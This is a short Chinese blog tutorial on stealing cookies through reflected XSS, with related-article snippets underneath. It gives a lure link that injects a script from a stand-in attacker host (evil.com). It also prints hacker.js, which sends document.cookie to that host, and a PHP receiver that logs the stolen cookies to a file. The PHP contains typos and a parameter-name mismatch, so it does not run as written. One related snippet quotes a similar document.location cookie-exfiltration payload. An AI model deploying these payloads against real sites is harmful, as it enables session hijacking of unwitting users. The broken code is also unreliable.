最简单的反射型XSS拿cookie

最新推荐文章于 2024-04-08 10:57:05 发布
最新推荐文章于 2024-04-08 10:57:05 发布
阅读量1.3w 收藏 9
点赞数 1
分类专栏: 随笔 XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thislocal/article/details/51010021
版权

参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》

主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射型。其实就是最简单的一个反射型cookie盗取过程。

一、XSS的一般过程:

1、找到XSS漏洞,假设存在于网站A;

2、发送可以触发该漏洞的,特定代码到攻击目标;

可以这样构造:<a href = "http://www.foo.com/xss/xss.php?x=<script src = http://www.evil.com/xss/hacker.js />凤姐最新性感视频</a>

其中,www.foo.com/xss/xss.php?x=是存在漏洞的网站A,执行盗取cookie操作的文件位于我们自己的网站 B。

B网站主要有两个文件,hacker.js和hacker.php

其中,hacker.js代码如下:(不是必须这么写,一个简单示例而已。)

//hacker.js

var img = new Image();

img.src = "http://www.evil.com/xss/hacker.php?X=" + document.cookie;

document.body.append(img);

hacker.php代码如下:

//hacker.php

<?php

$cookie = $_GET['x'];

var _dump($cookie);

$myFile = "cookie.txt";

file_put_contents($myFile, $cookei);

?>

3、这样当用户点击了链接(指”凤姐最新性感视频“)后,被攻击目标在网站A的cookie将被我们拿到,存到网站B和hacker.js同目录下的cookie.txt文件中。


注:在此过程中,学到的小知识还有:

1、php服务端设置cookie:

<?php

setcookie("cookie1", "value1");

?>


thislocal
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS ———— (二)利用反射XSS窃取用户Cookie信息并利用
weixin_43102772的博客
02-27 1109
思路: 搭建能接收cookie的服务器 构建带有XSS恶意代码的url 发给用户诱导用户点击url 获得用户cookie并利用 实验环境: kali————充当攻击者接收cookie的服务器 192.168.0.53 DVWA————充当客户要访问的目标网站 centos7————充当用户客户端 小试牛刀: 一、搭建服务器 1. kali开启Apache服务 systemctl start a...
cookie获取和反射xss具体案例演示
weixin_44720762的博客
05-01 2595
这篇博客用于介绍XSS的危害以及增加对XSS的理解。 下面对于cookie的介绍来源于百度,我个人认为对cookie的讲解已经很清楚了,方便同学阅读,在这里复制了一些。 cookie介绍: Cookie 可以翻译为“小甜品,小饼干” ,Cookie 在网络系统中几乎无处不在,当我们浏览以前访问过的网站时,网页中可能会出现 :你好 XXX,这会让我们感觉很亲切,就好像吃了一个小甜品一样。这其实是通过...
简单的利用XSS获取用户cookie
shy的博客
10-25 4266
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
XSS攻击原理及危害,说的太详细了!(值得收藏)
最新发布
周沐子
04-08 1867
防范存储反射 XSS 是后端的责任DOM XSS 攻击不发生在后端,是前端的责任。不同的上下文,调用不同的转义规则如 HTML 属性、HTML 文字内容、HTML 注释、跳转链接、内联 JavaScript 字符串、内联 CSS 样式表等,所需要的转义规则不一致。业务 需要选取合适的转义库,并针对不同的上下文调用不同的转义规则。
简单xss接收cookie平台的搭建以及xsscookie的一些总结
..
01-27 3865
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码提取码:tdoj 我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。 Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云 下面说一下在搭建过程中踩的坑。 一、在上传的时候直接上传解压好的_Blue...
基于dvwa的反射性xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1321
好切回正题,这段代码的是正则表达意思就是把这些'/
反射xss攻击代码.rar
05-14
xss攻击(java实现反射xss攻击,发送链接诱骗点击,编写服务端获取客户端的cookie信息)
反射xss攻击流量数据包
07-18
反射xss攻击流量数据包
网络安全原理与应用:反射XSS攻击演示.pptx
05-16
反射XSS攻击演示;;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;...
Web应用安全:反射XSS.pptx
06-18
反射XSS大多数是用来盗取用户的Cookie信息 特点是非持久化,也不存入网站服务器中,web后端漏洞反射XSS简介 1.反射XSS的缺点 必须用户点击带有特定恶意脚本代码参数的链接才能执行 恶意代码存放在url中,...
奇安信安全扫描漏洞解决路径遍历和存储xss反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
XSS-反射
热门推荐
qq_39416206的博客
03-14 1万+
xss反射
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4407
演示用靶场:dvwa
反射xsscookie(本地验证)
think_ycx的专栏
11-14 3174
原理反射xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。
pikachu靶场之反射XSScookie盗取)
weixin_45705209的博客
08-20 1918
反射XSS 尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。 利用漏洞获取cookie实例操作 这里我们用的例子是post,get利用容易被受害者察觉,因为get只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo
XSS入侵服务器盗取用户cookie
hughwupan的博客
03-28 1589
XSS入侵服务器盗取用户cookie欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导...
XSS配合CSRF的利用 获取cookie
沐目的博客
07-11 991
XSS的利用 获取cookie 今天主要学了下XSS的利用,昨天找漏洞,今天主要是利用漏洞。 主要就是围绕这句话展开的 <script>document.location=“http://cmumu.vip/flag.php?cookie=”+document.cookie</script> 1.首先找到XSS漏洞,然后让它可以执行这句话。 2.document.loca...
一次简单反射XSS操作及思路
qq_42097777的博客
04-04 3011
xss是类似对html代码的注入,拼接恶意代码获取cookie等 分为三种类,分别是反射、存储和dom 反射是不存入数据库,对自己有影响 存储是存入数据库,对来访者都有影响 1.进入靶场看到输入框,进行插入js标签 输入框里输入:< script>alert(1)</ script > 点击搜索 语句没有执行,而是被当做文本搜索了,这显然不是我们想看到的,点...
XSS基础入门/从0到1/非常基础/cookie/会话劫持
ChenD的学习笔记
10-10 1454
cookie介绍、XSSXSS盗取cookie、利用Cookie劫持会话
反射xss反射cookie是谁的cookie
07-27
反射 XSS 是一种 Web 攻击方式...而反射 XSS 并不直接获取用户的 Cookie,而是利用用户自身浏览器发送请求时携带的 Cookie 来进行攻击。因此,反射 XSS 攻击利用的是用户自己的 Cookie,而不是攻击者的 Cookie

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值